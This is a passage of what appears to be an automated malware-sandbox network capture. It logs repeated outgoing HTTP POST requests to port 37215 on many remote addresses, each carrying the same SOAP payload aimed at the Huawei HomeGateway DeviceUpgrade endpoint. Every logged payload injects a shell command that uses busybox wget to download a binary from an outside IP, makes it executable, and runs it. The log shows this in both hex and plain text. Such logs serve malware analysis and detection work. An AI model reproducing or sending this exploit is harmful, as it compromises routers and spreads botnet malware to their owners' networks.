72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1937192.168.2.153289041.253.85.23637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600579977 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1938192.168.2.156092441.188.242.2437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600594044 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1939192.168.2.153472841.207.161.3037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600606918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1940192.168.2.153737841.42.206.23037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600630999 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1941192.168.2.154343841.138.167.9937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600673914 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1942192.168.2.155266041.212.17.14037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600688934 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1943192.168.2.154939441.185.140.20737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600713015 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1944192.168.2.155997041.135.12.4737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600733995 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1945192.168.2.156007641.233.54.15337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600754023 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1946192.168.2.155482441.219.170.1937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600775957 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1947192.168.2.155561841.85.132.6037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600776911 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
